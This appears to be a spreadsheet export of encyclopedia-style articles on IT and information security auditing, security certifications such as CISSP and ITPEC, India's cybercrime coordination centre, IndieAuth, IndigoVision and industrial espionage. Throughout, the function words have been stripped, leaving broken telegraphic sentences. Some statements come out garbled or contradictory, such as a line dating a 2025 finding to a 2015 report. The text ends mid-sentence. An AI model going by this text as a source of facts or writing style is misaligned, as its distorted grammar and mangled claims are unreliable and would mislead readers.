developed accordance generally accepted standards systems development. management enterprise architecture: audit verify management developed organizational structure procedures ensure controlled efficient environment information processing. client/server, telecommunications, intranets, extranets: audit verify telecommunications controls place client (computer receiving services), server, network connecting clients servers.and lump audits type: "general control review" audits "application control review" audits. number audit professionals information assurance realm consider three fundamental types controls regardless type audit performed, especially realm. many frameworks standards break controls different disciplines arenas, terming “security controls“, ”access controls“, controls” effort define types controls involved. fundamental level, controls shown consist three types fundamental controls: protective/preventative controls, detective controls reactive/corrective controls. types auditors audits: internal external. auditing usually part accounting internal auditing, frequently performed corporate internal auditors. external auditor reviews findings internal audit well inputs, processing outputs information systems. external audit information systems primarily conducted certified information system auditors, cisa, certified isaca, information system audit control association usa, information system auditor (isa) certified icai (institute chartered accountants india), certified reputed organization audit. delete (frequently part overall external auditing performed certified public accountant (cpa) firm. auditing considers potential hazards controls information systems. focuses issues like operations, data, integrity, software applications, security, privacy, budgets expenditures, cost control, productivity. guidelines available assist auditors jobs, information systems audit control association. history auditing concept auditing formed mid-1960s. since time, auditing gone numerous changes, largely advances technology incorporation technology business. currently, many it-dependent companies rely information technology order operate business e.g. telecommunication banking company. types business, plays part company including applying workflow instead using paper request form, using application control instead manual control reliable implementing application facilitate organization using application. according these, importance audit constantly increased. important roles audit audit critical system order support financial audit support specific regulations announced e.g. sox. principles audit following principles audit find reflection: timeliness: only processes programming continuously inspected regard potential susceptibility faults weaknesses, well regard continuation analysis found strengths, comparative functional analysis similar applications updated frame continued. source openness: requires explicit reference audit encrypted programs, handling open source understood. e.g. programs, offering open source application, considering server open source, regarded critical. auditor take position paradigm need open source nature within cryptologic applications. elaborateness: audit processes oriented certain minimum standard. recent audit processes encrypting software often vary greatly quality, scope effectiveness also experience media reception often differing perceptions. because need special knowledge hand able read programming code hand also knowledge encryption procedures, many users even trust shortest statements formal confirmation. individual commitment auditor, e.g. quality, scale effectiveness, thus assessed reflexively documented within audit. financial context: further transparency needed clarify whether software developed commercially whether audit funded commercially (paid audit). makes difference whether private hobby community project whether commercial company behind scientific referencing learning perspectives: each audit describe findings detail within context also highlight progress development needs constructively. auditor parent program, least role mentor, auditor regarded part pdca learning circle (pdca plan-do-check-act). there next description detected vulnerabilities also description innovative opportunities development potentials. literature-inclusion: reader rely solely results review, also judge according loop management system (e.g. pdca, above), ensure, development team reviewer prepared carry analysis, also development review process open learnings consider notes others. list references accompanied case audit. inclusion user manuals documentation: further check done, whether manuals technical documentations, and, expanded. identify references innovations: applications allow both, messaging offline online contacts, considering chat e-mail application also case goldbug tested high priority (criterion presence chats addition e-mail function). auditor also highlight references innovations underpin research development needs.this list audit principles crypto applications describes beyond methods technical analysis particularly core values, taken account emerging issues there also audits imposed various standard boards required performed, depending upon audited organization, affect ensure departments performing certain functions controls appropriately considered compliant. examples audits ssae isae 3402, iso27001:2013. presence audits extension corporate presence beyond corporate firewall (e.g. adoption social media enterprise along proliferation cloud-based tools like social media management systems) elevated importance incorporating presence audits it/is audit. purposes audits include ensuring company taking necessary steps rein unauthorized tools (e.g. "shadow it") minimize damage reputation maintain regulatory compliance prevent information leakage mitigate third-party risk minimize governance riskthe departmental user developed tools controversial topic past. however, widespread availability data analytics tools, dashboards, statistical packages users longer need stand line waiting resources fulfill seemingly endless requests reports. task work business groups make authorized access reporting straightforward possible. simple example, users data matching pure relational tables linked meaningful way. needs make non-normalized, data warehouse type files available users analysis work simplified. example, organizations refresh warehouse periodically create easy "flat' tables easily uploaded package tableau used create dashboards. enterprise communications audits rise voip networks issues like byod increasing capabilities modern enterprise telephony systems causes increased risk critical telephony infrastructure misconfigured, leaving enterprise open possibility communications fraud reduced system stability. banks, financial institutions, contact centers typically policies enforced across communications systems. task auditing communications systems compliance policy falls specialized telecom auditors. these audits ensure company's communication systems: adhere stated policy follow policies designed minimize risk hacking phreaking maintain regulatory compliance prevent minimize toll fraud mitigate third-party risk minimize governance riskenterprise communications audits also called voice audits, term increasingly deprecated communications infrastructure increasingly becomes data-oriented data-dependent. term "telephony audit" also deprecated modern communications infrastructure, especially dealing customers, omni-channel, interaction takes place across multiple channels, telephone. issues plagues enterprise communication audits lack industry-defined government-approved standards. audits built basis adherence standards policies published organizations nist pci, absence standards enterprise communications audits means audits based organization's internal standards policies, rather industry standards. result, enterprise communications audits still manually done, random sampling checks. policy audit automation tools enterprise communications recently become available. ethical dilemmas audits artificial intelligence (ai) audits growing rapidly, corporate audits conducted using 2025 reported world economic forum 2015. audits raises many ethical issues. artificial intelligence causes unintended biases resultsan issue faces completing audits corporations unintended biases occur filters data. human element ability understand different situations certain data expected expected. understands data seen therefore unable evolve given unique situation. this causes unintended biases therefore unintended consequences systems given much trust carefully monitored human eye. result ethical, legal economic issues arise.2. technology replacing role humans firms invested significant amounts money emerging technologies audit space. used assurance practices performing tasks “auditing accounting procedures review general ledgers, compliance, preparing work-papers, data analytics, expense compliance, fraud detection, decision-making.” this essentially replaces need auditors relegates work assurance roles “overseers” technology. however, firms still need auditors perform analysis results audit. auditors understand algorithms utilized audit allow mistakes made imperfect programs. thus auditors extensive tech backgrounds degrees technology highly coveted firms utilizing perform audits. effect audit companies financial audits globalization combination growth information technology systems caused companies shift increasingly digitized working environment. advantages provided systems include reduction working time, ability test large amounts data, reduce audit risk, provide flexible complete analytical information. with increase time, auditors able implement additional audit tests, leading great improvement audit process overall. computer-assisted audit techniques (caats) allowed companies examine larger samples data thorough reviews transactions, allowing auditor test better understand issues within data.the systems audits transformed auditors accomplish important audit functions management databases, risk assurance controls, even governance compliance. addition, audit systems improve operational efficiency decision making would otherwise left hand-held calculations. systems help eliminate human error audits fully solve issue, systems proven helpful audits done small firms alike. these systems greatly reduced margin error audits provide better insight data analyzed. result increased systems audits, authoritative bodies american institute certified public accountants (aicpa) information systems audit control association (isaca) established guidance properly systems perform audits. auditors must adhere established guidelines utilizing systems audits. benefits utilizing systems financial audits systems techniques financial audits starting show huge benefits leading accounting firms. study done accounting firms, expected systems techniques generate increase $6.6 trillion dollars revenue result increase productivity. result, leading auditing firms making enormous investments goal increasing productivity therefore revenue development outsourcing systems techniques assist financial audits. pwc, biggest auditing firms world, narrowed three different types systems techniques firms develop implement achieve increased revenue productivity. first system created technology systems play supplemental role human auditors decision-making. this allows human auditor retain autonomy decisions technology support enhance ability perform accurate work, ultimately saving firm productivity costs. next, states systems problem solving abilities imperative producing accurate results. recognizes increased margin error unintended biases, thus need creating systems able adapt different scenarios. this type system requires decision making shared human auditor system produce maximum output allowing system take computing work could human auditor alone. finally, recognizes scenarios technology needs autonomy decision making independently. this allows human auditors focus important tasks technology takes care time consuming tasks require human time.the utilization systems techniques financial audits extend past goal reaching maximized productivity increased revenue. firms utilize systems assist completion audits able identify pieces data constitute fraud higher efficiency accuracy. example, systems drones approved four assist obtaining accurate inventory calculations, meanwhile voice facial recognition adding firms fraud cases. also electronic data processing computer forensics computer forensics data analysis operations helpdesk incident reporting auditing change management auditing disaster recovery business continuity auditing isae 3402 miscellaneous xbrl assurance irregularities illegal acts aicpa standard: consideration fraud financial statement audit computer fraud case studies references external links career information systems auditor, avinash kadam (network magazine) federal financial institutions examination council (ffiec) need caat technology open security architecture- controls patterns secure systems american institute certified public accountants (aicpa) services library (itil)</t>
  </si>
  <si>
    <t>Information security audit</t>
  </si>
  <si>
    <t>information security audit audit level information security organization. independent review examination system records, activities related documents. these audits intended improve level information security, avoid improper information security designs, optimize efficiency security safeguards security processes. within broad scope auditing information security multiple types audits, multiple objectives different audits, etc. most commonly controls audited categorized technical, physical administrative. auditing information security covers topics auditing physical security data centers auditing logical security databases, highlights components look different methods auditing areas. when centered information technology (it) aspects information security, seen part information technology audit. often referred information technology security audit computer security audit. however, information security encompasses much audit process step preliminary audit assessment auditor responsible assessing current technological maturity level company first stage audit. this stage used assess current status company helps identify required time, cost scope audit. first, need identify minimum security requirements: security policy standards organizational personal security communication, operation asset management physical environmental security access control compliance systems development maintenance security incident management disaster recovery business continuity management risk management step planning preparation auditor plan company's audit based information found previous step. planning audit helps auditor obtain sufficient appropriate evidence company's specific circumstances. helps predict audit costs reasonable level, assign proper manpower time line avoid misunderstandings clients.an auditor adequately educated company critical business activities conducting data center review. objective data center align data center activities goals business maintaining security integrity critical information processes. adequately determine whether client's goal achieved, auditor perform following conducting review: meet management determine possible areas concern review current organization chart review descriptions data center employees research operating systems, software applications, data center equipment operating within data center review company's policies procedures evaluate company's budget systems planning documentation review data center's disaster recovery plan step establishing audit objectives next step, auditor outlines objectives audit conducting review corporate data center takes place. auditors consider multiple factors relate data center procedures activities potentially identify audit risks operating environment assess controls place mitigate risks. after thorough testing analysis, auditor able adequately determine data center maintains proper controls operating efficiently effectively. following list objectives auditor review: personnel procedures responsibilities, including systems cross-functional training change management processes place followed management personnel appropriate back procedures place minimize downtime prevent loss important data data center adequate physical security controls prevent unauthorized access data center adequate environmental controls place ensure equipment protected fire flooding step performing review next step collecting evidence satisfy data center audit objectives. this involves traveling data center location observing processes within data center. following review procedures conducted satisfy pre-determined audit objectives: data centre personnel data center personnel authorized access data center (key cards, login id's, secure passwords, etc.). datacenter employees adequately educated data center equipment properly perform jobs. vendor service personnel supervised work data center equipment. auditor observe interview data center employees satisfy objectives. equipment auditor verify data center equipment working properly effectively. equipment utilization reports, equipment inspection damage functionality, system downtime records equipment performance measurements help auditor determine state data center equipment. additionally, auditor interview employees determine preventative maintenance policies place performed. policies procedures data center policies procedures documented located data center. important documented procedures include data center personnel responsibilities, back policies, security policies, employee termination policies, system operating procedures overview operating systems. physical security environmental controls auditor assess security client's data center. physical security includes bodyguards, locked cages, traps, single entrances, bolted-down equipment, computer monitoring systems. additionally, environmental controls place ensure security data center equipment. these include conditioning units, raised floors, humidifiers uninterruptible power supply. backup procedures auditor verify client backup procedures place case system failure. clients maintain backup data center separate location allows instantaneously continue operations instance system failure step preparing audit report after audit examination completed, audit findings suggestions corrective actions communicated responsible stakeholders formal meeting. this ensures better understanding support audit recommendations. also gives audited organization opportunity express views issues raised. writing report meeting describing agreements reached audit issues greatly enhance audit effectiveness. exit conferences also help finalize recommendations practical feasible. step issuing review report data center review report summarize auditor's findings similar format standard review report. review report dated completion auditor's inquiry procedures. state review entailed explain review provides "limited assurance" third parties. typically, data center review report consolidates entirety audit. also offers recommendations surrounding proper implementation physical safeguards advises client appropriate roles responsibilities personnel. contents include: auditors’ procedures findings auditors’ recommendations objective, scope, methodologies overview/conclusionsthe report optionally include rankings security vulnerabilities identified throughout performance audit urgency tasks necessary address them. rankings like “high”, “low”, “medium” used describe imperativeness tasks. performs audits generally, computer security audits performed federal state regulators information security audits would primarily prepared partners regulators. examples include: certified accountants, cybersecurity infrastructure security agency (cisa), federal office thrift supervision (ots), office comptroller currency (occ), u.s. department justice (doj), etc. corporate internal auditors information security audit internal audit, performed internal auditors employed organization. examples include: certificated accountants, cybersecurity infrastructure security agency (cisa), certified internet audit professional (ciap) external auditors typically, third-party experts employed independent organization specializing field data security hired state federal auditors accessible. consultants outsourcing technology auditing organization lacks specialized skill set. jobs certifications information security information security officer (iso) information security officer (iso) relatively position, emerged organizations deal aftermath chaotic growth information technology network communication. role nebulous since problem created address defined clearly. role become following dynamics security environment keeping risk posture balanced organization. certifications information systems audits combine efforts skill sets accounting technology fields. professionals fields rely another ensure security information data.with collaboration, security information system proven increase time. relation information systems audit, role auditor examine company’s controls security program. furthermore, auditor discloses operating effectiveness controls audit report. information systems audit control association (isaca), information technology professional organization, promotes gaining expertise various certifications. benefits certifications applicable external internal personnel system. examples certifications relevant information security audits include: certified information systems manager (cism) certified risk information systems control (crisc) certified governance enterprise (cgeit) certified information system auditor (cisa) (cybersecurity nexus fundamentals) csxp (cybersecurity nexus practitioner) audited systems network vulnerabilities interception: data transmitted network vulnerable intercepted unintended third party could data harmful use. availability: networks become wide-spanning, crossing hundreds thousands miles many rely access company information, lost connectivity could cause business interruption. access/entry point: networks vulnerable unwanted access. weak point network make information available intruders. also provide entry point viruses trojan horses. controls interception controls: interception partially deterred physical access controls data centers offices, including communication links terminate network wiring distributions located. encryption also helps secure wireless networks. availability controls: best control excellent network architecture monitoring. network redundant paths every resource access point automatic routing switch traffic available path without loss data time. access/entry point controls: most network controls point network connects external network. these controls limit traffic passes network. these include firewalls, intrusion detection systems, antivirus software.the auditor certain questions better understand network vulnerabilities. auditor first assess extent network structured. network diagram assist auditor process. next question auditor critical information network must protect. things enterprise systems, mail servers, servers, host applications accessed customers typically areas focus. also important know access parts. customers vendors access systems network? employees access information home? lastly, auditor assess network connected external networks protected. most networks least connected internet, could point vulnerability. these critical questions protecting networks. segregation duties when function deals money either incoming outgoing important make sure duties segregated minimize hopefully prevent fraud. ways ensure proper segregation duties (sod) systems perspective review individuals’ access authorizations. certain systems claim come capability perform tests, functionality provided elementary, requiring time-consuming queries built limited transaction level little object field values assigned user transaction, often produces misleading results. complex systems sap, often preferred tools developed specifically assess analyze conflicts types system activity. systems multiple system formats monitor users superuser access system giving unlimited access aspects system. also, developing matrix functions highlighting points proper segregation duties breached help identify potential material weaknesses cross-checking employee's available accesses. this important development function production. ensuring people develop programs ones authorized pull production preventing unauthorized programs production environment used perpetrate fraud. types audits encryption audit assessing need client implement encryption policies organization, auditor conduct analysis client's risk data value. companies multiple external users, e-commerce applications, sensitive customer/employee information maintain rigid encryption policies aimed encrypting correct data appropriate stage data collection process.auditors continually evaluate client's encryption policies procedures. companies heavily reliant e-commerce systems wireless networks extremely vulnerable theft loss critical information transmission. policies procedures documented carried ensure transmitted data protected. auditor verify management controls place data encryption management process. access keys require dual control, keys composed separate components maintained computer accessible programmers outside users. furthermore, management attest encryption policies ensure data protection desired level verify cost encrypting data exceed value information itself. data required maintained extensive amount time encrypted transported remote location. procedures place guarantee encrypted sensitive information arrives location stored properly. finally, auditor attain verification management encryption system strong, attackable, compliant local international laws regulations. logical security audit just sounds, logical security audit follows format organized procedure. first step audit system seek understand components structure. when auditing logical security auditor investigate security controls place, work. particular, following areas points auditing logical security: passwords: every company written policies regarding passwords, employees' them. passwords shared employees mandatory scheduled changes. employees user rights line functions. they also aware proper procedures. also helpful security tokens, small devices authorized users computer programs networks carry assist identity confirmation. they also store cryptographic keys biometric data. popular type security token (rsa's securid) displays number changes every minute. users authenticated entering personal identification number number token. termination procedures: proper termination procedures that, employees longer access network. this done changing passwords codes. also, cards badges circulation documented accounted for. special user accounts: special user accounts privileged accounts monitored proper controls place. remote access: remote access often point intruders enter system. logical security tools used remote access strict. remote access logged. specific tools used network security network security achieved various tools including firewalls proxy servers, encryption, logical security access controls, anti-virus software, auditing systems management. firewalls basic part network security. they often placed private local network internet. firewalls provide flow-through traffic authenticated, monitored, logged, reported. some different types firewalls include network layer firewalls, screened subnet firewalls, packet filter firewalls, dynamic packet filtering firewalls, hybrid firewalls, transparent firewalls, application-level firewalls. process encryption involves converting plain text series unreadable characters known ciphertext. encrypted text stolen attained transit, content unreadable viewer. this guarantees secure transmission extremely useful companies sending/receiving critical information. once encrypted information arrives intended recipient, decryption process deployed restore ciphertext back plaintext. proxy servers hide true address client workstation also firewall. proxy server firewalls special software enforce authentication. proxy server firewalls middle user requests. antivirus software programs mcafee symantec software locate dispose malicious content. these virus protection programs live updates ensure latest information known computer viruses. logical security includes software safeguards organization's systems, including user password access, authentication, access rights authority levels. these measures ensure authorized users able perform actions access information network workstation. auditing systems, track record happens organization's network. management solutions often used centrally collect audit trails heterogeneous systems analysis forensics. management excellent tracking identifying unauthorized users might trying access network, authorized users accessing network changes user authorities. software record index user activities within window sessions observeit provide comprehensive audit trail user activities connected remotely terminal services, citrix remote access software. behavioral audit vulnerabilities organization's systems often attributed technical weaknesses, rather related individual behavior employees within organization. simple example users leaving computers unlocked vulnerable phishing attacks. result, thorough infosec audit frequently include penetration test auditors attempt gain access much system possible, perspective typical employee well outsider. behavioral audit ensures preventative measures place phishing webinar, employees made aware phishing detect system process assurance audits combine elements infrastructure application/information security audits diverse controls categories completeness, accuracy, validity restricted access (cavr). auditing application security application security application security centers three main functions: programming processing accesswhen comes programming important ensure proper physical password protection exists around servers mainframes development update systems. having physical access security one's data center office electronic badges badge readers, security guards, choke points, security cameras vitally important ensuring security applications data. then needs security around changes system. those usually proper security access make changes proper authorization procedures place pulling programming changes development test finally production. with processing, important procedures monitoring different aspects input falsified erroneous data, incomplete processing, duplicate transactions untimely processing place. making sure input randomly reviewed processing proper approval ensure this. important able identify incomplete processing ensure proper procedures place either completing deleting system error. there also procedures identify correct duplicate entries. finally, comes processing done timely basis back-track associated data delay coming identify whether delay creates control concerns. finally, access, important realize maintaining network security unauthorized access major focuses companies threats come sources. first, internal unauthorized access. important system access passwords must changed regularly track access changes able identify made changes. activity logged. second arena concerned remote access, people accessing one's system outside internet. setting firewalls password protection on-line data changes protecting unauthorized remote access. identify weaknesses access controls bring hacker crack one's system either gaining entry building using internal terminal hacking outside remote access. summary information security audit defined examining different aspects information security. external internal professionals within institution responsibility maintaining inspecting adequacy effectiveness information security. institution, various controls implemented maintained. secure information, institution expected apply security measures circumvent outside intervention.by large, concepts application security segregation duties many ways connected goal, protect integrity companies’ data prevent fraud. application security, preventing unauthorized access hardware software proper security measures physical electronic place. with segregation duties, primarily physical review individuals’ access systems processing ensuring overlaps could lead fraud.the type audit individual performs determines specific procedures tests executed throughout audit process. also computer security defensive computing directive 95/46/ec protection personal data (european union) ethical hack information security penetration test security breach references bibliography gallegos, frederick; senft, sandra; manson, daniel gonzales, carol (2004). technology control audit (2nd ed.). auerbach publications. isbn 0-8493-2032-1. external links examining data centers network auditing openxdas project information systems audit control association (isaca) institute internal auditors</t>
  </si>
  <si>
    <t>Information Technology Professional Examination Council</t>
  </si>
  <si>
    <t>information technology professional examination council (itpec), organization conducts information technology examinations throughout asian countries. formed promote information exchange among examination bodies asia, facilitate efforts development common examination questions administration exam date time. established support international strategies spheres software development information technology human resources. established november 2005 representatives countries adopted jitec-ipa's examination skill standards conduct common examinations. these examinations loosely based japanese information-technology engineers examination. council's members currently include philippines, thailand, vietnam, myanmar, malaysia, mongolia, japan bangladesh. these countries agreed conduct examination date time questions, examination consistent among member countries. this consistency enables accurate measurement skills examinees, region shares skill standards. itpec members information technology promotion agency (ipa) japan philippine national standards foundation (philnits) multimedia technology enhancement operations sendirian berhad (meteor) malaysia myanmar computer federation (mcf) national park (nitp) mongolia nstda academy thailand hi-tech incubation training center (hitc) vietnam bangladesh computer council (bcc) bangladesh certifications itpec exam itpec information technology passport examination (itpec exam) loosely based japan information technology information technology passport examination translated english, thai, vietnamese, mongol, burmese. exam requires person basic knowledge business workers commonly possess, perform utilize related tasks his/her charge. facts exam duration minutes exam type: multiple choice (one four choices), questions short question type question item, questions medium question type four questions item, questions items) exam sections technology field management field strategy field point allocation 1000 points grading method according points, point weight allocated question passing criteria pass granted conditions satisfied:total points 600+ points points field: maximum points three fields. (strategy 140, management technology 110) scope computer systems networks; office tools utilization. performance, characteristics functions information devices settings application software office tools utilization, application software groupware used workplace corporate activity related tasks, systematic thinking logical thinking, problem analysis problem solving methodologies. task work flows, issue identification simple analytical methods, identity issues independent consensus approach solutions relevant laws regulations, various information security provisions. compliance information technology intellectual property laws regulations internal compliance programs processes prevent leakage, loss damage information internet usage development operations information systems. investigation organization data systematization tasks itpec exam itpec fundamental information technology engineer examination (itpec exam) loosely based japan information technology fundamental engineers examination translated english, thai, vietnamese, mongol, burmese. scope examination covers knowledge skills required individuals basic knowledge skills related general aspects information technology, including compose program design sheets, construct programs, conduct series operations extent unit tests information systems development projects. information technology engineers examination (itee) first administered japan 1969, 1970 became national examination former ministry international trade industry (miti, ministry economy, trade industry [meti]). grown largest scale national examinations japan played important role development engineers. october 2000, "asian common skill standards initiative", proposed japan, adopted asean plus japan, people's republic china, republic korea meeting. accordance initiative, working toward mutual recognition skill standards engineers asia. this collaboration expected help increase cross-border utilization human resources stimulate business alliances across region. since april 2006, common examination conducted twice year, first sunday april third sunday october simultaneously starting 1000h japanese standard time. test sections exam administered total five hours broken parts: exam multiple-choice examination runs minutes. composed questions, compulsory multiple choice. generally involves application fundamental concepts terms, simple numerical calculations logical analysis. total score 1000 question weight depending difficulty. points passing score. exam multiple-choice examination runs minutes. covers knowledge skills required individuals able implement pseudocodes flowcharts. require skills debugging ability trace output structured program. total score 1000 question weight depending difficulty. points passing score.each question several sub-questions, answered multiple choice. final portion composed 4-question sets. person must select question depending choice programming language (either programming language java programming language). scope itpec exam itpec applied information technology examination, formerly known software design development engineer examination, also loosely based japanese counterpart, exam, require individuals least years work experience software development ability compose internal design program design sheets, construct effective programs information systems development projects, perform series processes ranging unit tests integrated tests. conducted year venue exams. exam administered total five half hours broken parts: exam, multiple-choice examination lasts minutes, written exams: first sub-part runs minutes final sub-part runs minutes. external links itpec official website philnits (philippines) (japan) bd-itec (bangladesh) meteor (malaysia) nitp (mongolia) (myanmar) nstda academy (thailand) vitec (vietnam) references</t>
  </si>
  <si>
    <t>Information Technology Architect Certification</t>
  </si>
  <si>
    <t>architect certification independent global certification program qualifying skills, knowledge experience business enterprise architects. this program developed open group members response growing demand experienced architects. open group, vendor- technology-neutral industry consortium, offers architect certification certify skills experience architecture community. program program based proven best practices industry sets independent, industry-wide standard architects... under program, practicing architects achieve certification based demonstrating substantial skills, experience success designing solutions across whole lifecycle. addition certifying individuals directly, program also provides accreditation third-party architect certification programs. skill experience requirements direct certification accredited programs same. first accredited program (ibm's) announced january 2006. addition, franchise option available professional societies eligible organizations. accenture started 2006 similar master technology architect certification program qualify recognize professionals expertise also experience track record certification levels certification available levels: master certified architect (candidates must able perform independently take responsibility delivery systems solutions lead architects), certified architect (candidates must able perform assistance/supervision, wide range appropriate skills, contributing architects). level certified architect candidate able perform assistance/supervision, wide range appropriate skills, contributing architect. certified architect candidates must practicing enterprise architects least years' experience developing architectures supervision; example, mentoring. they expected ability produce architectures occasional assistance experienced architects (e.g., master level architects). level master architect master certified architect able perform independently take responsibility delivery systems solutions lead architect. certified master architect candidates must practicing enterprise architects least three years recent experience developing architectures. they must demonstrate core foundation skills include people skills, project management skills architecture skills, meet requirements related experience, professional development, contribution architecture community. requirements must documented application. level distinguished architect distinguished certified architect effects significant breadth depth impact business three advanced career paths: chief/lead architect, enterprise architect architect profession leader.it architects certified listed publicly available directory certified architects. also software architecture information technology references external links certification accreditation documents white paper: open group architect certification program iasa: global architect association software development magazine gettin' certified certcities architecture certifications point toward future computerworld better way? cert-start feedback forum certifying software development times certification architects certification magazine open group launches architect certification first accredited architect certification program: (announcement) certification magazine itac enterprise architect accenture master technology architect program</t>
  </si>
  <si>
    <t>Information Systems Security Management Professional</t>
  </si>
  <si>
    <t>cissp (certified information systems security professional) independent information security certification granted international information system security certification consortium, also known (isc)². january, 2022 152,632 (isc)² members holding cissp certification worldwide.in june 2004, cissp designation accredited ansi iso/iec standard 17024:2003. also formally approved u.s. department defense (dod) information assurance technical (iat), managerial (iam), system architect engineer (iasae) categories dodd 8570 certification requirement.in 2020, national academic recognition information centre assessed cissp qualification level award, level masters degree. change enable cyber security professionals cissp certification towards higher education course credit also open opportunities roles require recognize master’s degrees. history mid-1980s, need arose standardized, vendor-neutral certification program provided structure demonstrated competence. november 1988, special interest group computer security (sig-cs), member data processing management association (dpma), brought together several organizations interested goal. international information systems security certification consortium "(isc)²" formed mid-1989 non-profit organization.by 1990, first working committee establish common body knowledge (cbk) formed. first version finalized 1992, cissp credential launched 1994.in 2003 cissp adopted baseline u.s. national security agency's issep program. certification subject matter cissp curriculum breaks subject matter variety information security topics referred domains. cissp examination based (isc)² terms common body knowledge cbk). according (isc)², "the cissp taxonomy collection topics relevant information security professionals around world. cissp establishes common framework information security terms principles allow information security professionals worldwide discuss, debate resolve matters pertaining profession common understanding."from 2021 domain refresh impact weighting domains, domains change.from april 2018, eight domains covered security risk management asset security security architecture engineering communication network security identity access management security assessment testing security operations software development securityfrom 2015 early 2018, cissp curriculum divided eight domains similar latest curriculum above. domain changed name "security engineering," 2018 revision expanded "security architecture engineering."before 2015, covered domains: operations security telecommunications network security information security governance risk management software development security cryptography security architecture design access control business continuity disaster recovery planning legal, regulations, investigations compliance physical (environmental) security requirements possess minimum five years direct full-time security work experience (isc)² information security domains (cbk). year waived either four-year college degree, master's degree information security, possessing number certifications. candidate without five years experience earn associate (isc)² designation passing required cissp examination, valid maximum years. during years candidate need obtain required experience submit required endorsement form certification cissp. upon completion professional experience requirements certification converted cissp status. attest truth assertions regarding professional experience accept cissp code ethics. answer questions regarding criminal history related background. pass multiple choice cissp exam (four hours, questions, adaptive exam) scaled score points greater 1000 possible points, must achieve pass eight domains. have qualifications endorsed another (isc)² certification holder good standing. member counts number cissp members january 1st, 2022 152,632. concentrations holders cissp certifications earn additional certifications areas speciality. there three possibilities: information systems security architecture professional (cissp-issap), advanced information security certification issued (isc)² focuses architecture aspects information security. certification exam consists questions covering domain areas:identity access management architecture security operations architecture infrastructure security architect governance, compliance, risk management security architecture modeling architect application securityas july 2021, 2,158 (isc)² members holding cissp-issap certification worldwide. information systems security engineering professional (cissp-issep), advanced information security certification issued (isc)² focuses engineering aspects information security across systems development life cycle. october 2014 announced curricula would made available public united states department homeland security national initiative cybersecurity careers studies program. both zdnet network world named issep tech’s valuable certifications. certification exam consists questions covering domain area:security engineering principles risk management security planning, design, implementation secure operations, maintenance, disposal secure engineering technical managementas july 2021, 1,272 (isc)² members holding cissp-issep certification worldwide. information systems security management professional (cissp-issmp), advanced information security certification issued (isc)² focuses management aspects information security. september 2014, computerworld rated issmp valuable certifications tech. certification exam consists questions covering domain areas:leadership business management systems lifecycle management risk management threat intelligence incident management contingency management law, ethics, security compliance managementas july 2021, 1,324 (isc)² members holding cissp-issmp certification worldwide. fees ongoing certification standard exam costs us-$ 2021. completion exam, gain certification need complete endorsement process evidence least five years experience within domains. dispensation claimed year relevant academic qualification. final step payment annual maintenance $125 2020). cissp credential valid three years; holders renew either submitting continuing professional education (cpe) credits year three years re-taking exam. credits gained completing relevant professional education. value 2005, certification magazine surveyed 35,167 professionals countries compensation found cissps list certificates ranked salary. 2006 certification magazine salary survey also ranked cissp credential highly, ranked cissp concentration certifications best-paid credentials it.in 2008, another study came conclusion professionals cissp major security certifications) least years experience tend salaries around 26%) higher professionals similar experience levels certificates. note actual cause-and-effect relationship certificate salaries remains unproven.as 2017, study cybersecuritydegrees.com surveyed 10,000 current historical cyber security listings preferred candidates holding cissp certifications. cybersecuritydegrees found openings offered average salary average cyber security salary.ansi certifies cissp meets requirements ansi/iso/iec standard 17024, personnel certification accreditation program. also cism (certified information security manager) references external links official website</t>
  </si>
  <si>
    <t>Indian Cyber Crime Coordination Centre</t>
  </si>
  <si>
    <t>indian cyber crime coordination centre (i4c; hindi: भारतीय साइबर अपराध समन्वय केंद्र) government initiative deal cybercrime india, coordinated effective manner. affiliated ministry home affairs, government india. scheme approved october 2018 proposed amount ₹415.86 crore (us$52 million). history scheme indian cyber crime coordination centre approved october 2018 ministry home affairs (india). inaugurated delhi january 2020 amit shah, home minister india.in june 2020, recommendation i4c, government india banned chinese origin mobile apps. overview indian cyber crime coordination centre components national cyber crime threat analytics unit (tau) national cyber crime reporting portal national cyber crime training centre cyber crime ecosystem management unit national cyber crime research innovation centre national cyber crime forensic laboratory (ncfl) ecosystem platform joint cyber crime investigation team also national cyber coordination centre cybercrime india reference external links details indian cybercrime coordination centre (i4c) scheme (ministry home affairs)</t>
  </si>
  <si>
    <t>IndieAuth</t>
  </si>
  <si>
    <t>indieauth open standard decentralized authentication protocol uses oauth enables services verify identity user represented well obtain access token used access resources control user.indieauth developed indieweb community published note. published note social working group lacking time needed formally progress recommendation, despite several interoperable implementations. implementations wordpress indieauth plugin known micro.blog grav (cms) indieauth plugin drupal indieweb plugin cellar door also openid webid references external links indieauth specification</t>
  </si>
  <si>
    <t>IndigoVision</t>
  </si>
  <si>
    <t>indigovision video surveillance systems company based edinburgh, scotland, founded 1994.originally developing generic internet protocol video technology videobridge brand, later specialised video surveillance market. 2000, floated public limited company london stock exchange.more recently, focused large-scale video security systems. products include video management software, cameras network video recorders. notable installations include eurotunnel, amsterdam airport schiphol, indira gandhi international airport terminal canada–us border.as 2014, indigovision sales support staff across countries. provides support regional centers including jersey, paulo, singapore, dubai, london edinburgh, training facilities, demo suites local stocking. partners approximately trained system integrators provide local installation service users world.in march 2020, motorola solutions announced would acquire company £30.4 million. acquisition completed june 2020. products indigovision relabels cameras manufactured avigilon, also motorola solutions company. company, formerly relabeled cameras manufactured dahua technology, told ipvm change made ndaa supply-chain concerns. references external links official website</t>
  </si>
  <si>
    <t>Industrial espionage</t>
  </si>
  <si>
    <t>industrial espionage, economic espionage, corporate spying, corporate espionage form espionage conducted commercial purposes instead purely national security.while economic espionage conducted orchestrated governments international scope, industrial corporate espionage often national occurs companies corporations. forms economic industrial espionage economic industrial espionage takes place main forms. short, purpose espionage gather knowledge organizations. include acquisition intellectual property, information industrial manufacture, ideas, techniques processes, recipes formulas. could include sequestration proprietary operational information, customer datasets, pricing, sales, marketing, research development, policies, prospective bids, planning marketing strategies changing compositions locations production. describe activities theft trade secrets, bribery, blackmail technological surveillance. well orchestrating espionage commercial organizations, governments also targets example, determine terms tender government contract. target industries economic industrial espionage commonly associated technology-heavy industries, including computer software hardware, biotechnology, aerospace, telecommunications, transportation engine technology, automobiles, machine tools, energy, materials coatings silicon valley known world's targeted areas espionage, though industry information competitors target. information theft sabotage information make difference success failure; trade secret stolen, competitive playing field leveled even tipped favor competitor. although information-gathering accomplished legally competitive intelligence, times corporations feel best information take economic industrial espionage threat business whose livelihood depends information. recent years, economic industrial espionage taken expanded definition. instance, attempts sabotage corporation considered industrial espionage; sense, term takes wider connotations parent word. that espionage sabotage (corporate otherwise) become clearly associated also demonstrated number profiling studies, government, corporate. united states government currently 